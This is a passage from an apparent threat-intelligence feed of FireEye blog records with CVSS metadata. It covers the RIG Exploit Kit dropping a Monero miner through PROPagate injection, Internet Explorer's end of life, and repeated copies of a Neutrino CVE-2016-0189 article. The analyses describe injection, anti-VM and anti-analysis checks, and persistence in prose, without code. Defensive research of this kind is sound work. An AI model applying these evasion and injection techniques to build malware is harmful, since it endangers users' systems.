Malware modifies the callback address with the injected shellcode address (Figure 16).\n\n \nFigure 16: Modifying callback function\n\nThe malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.\n\nThe shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.\n\n \nFigure 17: Assembly view of injected shellcode\n\n#### Analysis of Third Stage Payload\n\nBefore executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.\n\nThe first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.\n\nThe second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. 
If the generated value matches any value in the array, it terminates the process related to the corresponding window.\n\nOther than these two anti-analysis techniques, it also has code to check internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.\n\nTo remain persistent in the system, the malware installs a scheduled task and a shortcut file in the %startup% folder. The scheduled task is named \u201cOpera Scheduled Autoupdate {Decimal Value of GetTickCount()}\u201d.\n\nThe malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates an MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.\n\n \nFigure 18: Network communication\n\nThe malware then downloads the final payload, the Monero miner, from the server and installs it in the system.\n\n#### Conclusion\n\nAlthough we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. 
We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.\n\nFireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.\n\n#### Acknowledgement\n\nWe would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-28T16:00:00", "type": "fireeye", "title": "RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419", "CVE-2016-0189", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-06-28T16:00:00", "id": "FIREEYE:D9B02C48E42AD3B4134C515CEB7E23C8", "href": "https://www.fireeye.com/blog/threat-research/2018/06/rig-ek-delivering-monero-miner-via-propagate-injection-technique.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:23", "description": "#### Introduction\n\nThrough FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) 
delivering a dropper that leverages the [PROPagate injection technique](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject code that downloads and executes a Monero miner (similar activity has been reported by [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/rig-exploit-kit-now-using-cve-2018-8174-to-deliver-monero-miner/>)). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.\n\n#### Attack Chain\n\nThe attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.\n\n \nFigure 1: Attack chain flow chart\n\n#### Exploit Kit Analysis\n\nWhen the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.\n\n \nFigure 2: Injected iframe\n\nThe landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. 
None of these techniques is new, so we will only give a brief overview of each in this post.\n\n#### JavaScript 1\n\nThe first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.\n\n \nFigure 3: JavaScript 1 code snippet\n\nThe VBScript exploits [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>), which allows it to download the payload and execute it using the code snippet seen in Figure 4.\n\n \nFigure 4: VBScript code snippet\n\n#### JavaScript 2\n\nThe second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.\n\n \nFigure 5: JavaScript 2 code snippet\n\nThis newly appended JavaScript exploits [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>), which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.\n\n \nFigure 6: Obfuscation using variables\n\nUsing these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419, which in turn will cause native code execution, as shown in Figure 7.\n\n \nFigure 7: Call to JSON.stringify\n\n#### JavaScript 3\n\nThe third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. 
This additional JavaScript adds a flash object that exploits [CVE-2018-4878](<https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html>), as shown in Figure 8.\n\n \nFigure 8: JavaScript 3 code snippet\n\nOnce the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.\n\n \nFigure 9: WScript command line\n\nThis JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.\n\n \nFigure 10: Malicious command line\n\n#### Payload Analysis\n\nFor this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.\n\n \nFigure 11: Malware activity flow chart\n\n#### Analysis of NSIS Loader (SmokeLoader)\n\nThe first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named \u2018kumar.dll\u2019 and \u2018abaram.dat\u2019 in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).\n\nThe DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.\n\n#### Analysis of Injected Code (Second Stage Payload)\n\nThe second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.\n\nAt the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. 
It also contains code that checks whether the executable is being debugged, which it extracts from offset 0x2 of the PEB. If the _BeingDebugged_ flag is set, the executable terminates itself.\n\nThe malware also implements an Anti-VM check by opening the registry key **HKLM\\SYSTEM\\ControlSet001\\Services\\Disk\\Enum** with value 0.\n\nIt checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen. Each of these strings is indicative of virtual machines.\n\nAfter running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.\n\nThe malware uses the [PROPagate injection method](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.\n\nThis code injection technique only works for a process with a lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.\n\n \nFigure 12: Checking integrity level of current process\n\nIf the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.\n\nThe malware creates a file mapping object and writes the dropper file path to it; the same mapping object is accessed by the injected code to read the dropper file path and delete the dropper file. 
The name of the mapping object is derived from the volume serial number of the system drive and an XOR operation with a hardcoded value (Figure 13).\n\n_File Mapping Object Name = \u201cVolume Serial Number\u201d + \u201cVolume Serial Number\u201d XOR 0x7E766791_\n\n \nFigure 13: Creating file mapping object name\n\nThe malware then decrypts the third stage payload using XOR and decompresses it with RtlDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of the decrypted data, we can get the proper executable header (Figure 14).\n\n \nFigure 14: Injected executable without header (left), and with header (right)\n\nAfter decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses the GetShellWindow and GetWindowThreadProcessId APIs to get the shell window\u2019s thread ID (Figure 15).\n\n \nFigure 15: Getting shell window thread ID\n\nThe malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.\n\nAfter injecting the payload into the target process, it uses the EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares each with UxSubclassInfo.\n\nAfter finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.\n\nSetPropA has three arguments, the third of which is data. The callback procedure address is stored at offset 0x14 from the beginning of data. 
The malware overwrites the callback address with the injected shellcode address (Figure 16).\n\n \nFigure 16: Modifying callback function\n\nThe malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.\n\nThe shellcode contains code to execute the entry point of the injected third stage payload using CreateThread. It then restores the callback for SetPropA, which was modified by the malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.\n\n \nFigure 17: Assembly view of injected shellcode\n\n#### Analysis of Third Stage Payload\n\nBefore executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running on the system. It creates two infinitely running threads that contain code to implement the anti-analysis checks.\n\nThe first thread enumerates the processes using CreateToolhelp32Snapshot and checks for process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with an array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.\n\nThe second thread enumerates the windows using EnumWindows. It uses the GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with an array of hardcoded DWORD values. 
If the generated value matches any value in the array, it terminates the process that owns the corresponding window.\n\nOther than these two anti-analysis techniques, it also has code to check internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.\n\nTo remain persistent on the system, the malware installs a scheduled task and a shortcut file in the %startup% folder. The scheduled task is named \u201cOpera Scheduled Autoupdate {Decimal Value of GetTickCount()}\u201d.\n\nThe malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates an MD5 hash value using the Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.\n\n \nFigure 18: Network communication\n\nThe malware then downloads the final payload, the Monero miner, from the server and installs it on the system.\n\n#### Conclusion\n\nAlthough we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. 
We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.\n\nFireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.\n\n#### Acknowledgement\n\nWe would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.\n", "edition": 2, "cvss3": {}, "published": "2018-06-28T12:00:00", "type": "fireeye", "title": "RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8174", "CVE-2018-4878", "CVE-2016-0189", "CVE-2015-2419"], "modified": "2018-06-28T12:00:00", "id": "FIREEYE:622FA05F62A3EDD3379557F635579EFB", "href": "https://www.fireeye.com/blog/threat-research/2018/06/rig-ek-delivering-monero-miner-via-propagate-injection-technique.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "description": "Microsoft has started the year with an [announcement](<https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support>) that, effective Jan. 12, 2016, support for all older versions of Internet Explorer (IE) will come to an end (known as an EoL, or End of Life). The affected versions are Internet Explorer 7, 8, 9, and 10.\n\nWhat this means for users is that Microsoft will no longer release new security updates for these product versions going forward. 
This gives users two options: Internet Explorer 11 and Microsoft Edge, the latter of which is currently exclusive to Windows 10. If users would like to keep their browsers up to date, they will need to upgrade to either of these two options.\n\nIt should go without saying that Internet Explorer users are strongly encouraged to update to the latest version. It offers improved security with the latest security features and mitigations. Two notable mitigations introduced to the browser in 2014 are Isolated Heap and Memory Protect, which were implemented on Patch Tuesday of June and July 2014 respectively. Prior to that, Microsoft made a similar announcement about the Windows XP Operating System, wherein they issued an End of Life for XP in April 2014.\n\nThese are all steps in the right direction for the Microsoft teams because it allows for the consolidation of team efforts, resulting in a stronger focus on securing fewer versions across a smaller code base. Microsoft continues to silently enhance protections as the months go by while at the same time trimming code.\n\nFigure 1 shows the vulnerability counts for Internet Explorer versions in 2015.\n\n\n\nFigure 1. Internet Explorer vulnerability count for 2015 [1]\n\nThe graph above shows the total number of reported vulnerabilities affecting each version of Internet Explorer across the months of 2015. 
Keeping in mind that these are non-unique counts, we can observe that, for the most part, the majority of the reported vulnerabilities affected Internet Explorer 11.\n\nFigure 2 shows the most notable in-the-wild (ITW) attacks exploiting Internet Explorer in 2014 and 2015.\n\nYear | CVE | Affects\n---|---|---\n2014 | [CVE-2014-0322](<http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>) | IE 9 and 10\n2014 | [CVE-2014-1776](<http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html>) | IE 6 to 11\n2015 | [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) | IE 10 and 11\n2015 | [CVE-2015-2502](<http://krebsonsecurity.com/2015/08/microsoft-pushes-emergency-patch-for-ie/>) | IE 7 to 11\n\nFigure 2. ITW attacks of Internet Explorer [1]\n\nThe majority of the attacks found ITW in 2014 and 2015 affected IE 11.\n\nFigure 3 compares the count of vulnerabilities that affect Internet Explorer 11 (IE 11) to the ones that don\u2019t.\n\n\n\nFigure 3. IE11 vs. Non-IE11 vulnerability count [1]\n\nBased on the information found in Figures 1, 2, and 3, most of the vulnerabilities reported in 2015 affected Internet Explorer 11. This shows that attackers, as well as researchers, are focusing considerably on Internet Explorer 11. Microsoft\u2019s most recent move will allow the company to do the same.\n\nIt should be noted that, as of Internet Explorer 11, some features are no longer supported or are considered deprecated. 
These include, but are not limited to, [VML](<https://msdn.microsoft.com/en-us/library/hh801223\\(v=vs.85\\).aspx>) and [VBScript](<https://msdn.microsoft.com/en-us/library/dn384057\\(v=vs.85\\).aspx>), which have been used to [exploit](<http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php>) and [compromise](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) the integrity of Internet Explorer, or leveraged to bypass ASLR/DEP in the past. This is a strong move in the right direction, as trimming the code base leads to shrinking the attack surface. This helps secure products such as Internet Explorer.\n\nIt is also worth noting that at this point no ITW attacks have been observed against Microsoft Edge, the new web browser that currently ships exclusively with Windows 10. Microsoft Edge also follows the same approach of removing unnecessary features such as ActiveX and Browser Helper Objects, as well as [others](<https://blogs.windows.com/msedgedev/2015/05/06/a-break-from-the-past-part-2-saying-goodbye-to-activex-vbscript-attachevent/>).\n\nIn conclusion, after Jan. 12, 2016, older Internet Explorer users will be exposed to vulnerabilities that may be exploited by malware and targeted by Exploit Kits. 
The best way to defend against this is to keep your browser up to date by upgrading to Internet Explorer 11 or using Microsoft Edge.\n\n[1] Microsoft Security Bulletins: <https://technet.microsoft.com/en-us/library/security/dn610807.aspx>\n", "edition": 2, "cvss3": {}, "published": "2016-01-12T14:49:00", "type": "fireeye", "title": "End of Life for Internet Explorer 8, 9 and 10", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0322", "CVE-2015-2502", "CVE-2015-2419", "CVE-2014-1776"], "modified": "2016-01-12T14:49:00", "id": "FIREEYE:7D8237F41EA87865A58B16DF63389DAA", "href": "https://www.fireeye.com/blog/threat-research/2016/01/end_of_life_for_ie.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:29", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. 
It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf\u201d property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. 
The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T20:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-8651", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-07-14T20:37:00", "id": "FIREEYE:FAB9D3AA433B8323FF6FA7ABC6AD4069", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:19", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in 
Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. 
Memory corruption can occur if the \u201cvalueOf\u201d property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T16:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-07-14T16:37:00", "id": "FIREEYE:94FA42F08227BCEDB46BD7010CC3A45D", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-17T14:44:04", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). 
CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf\u201d property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T16:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", 
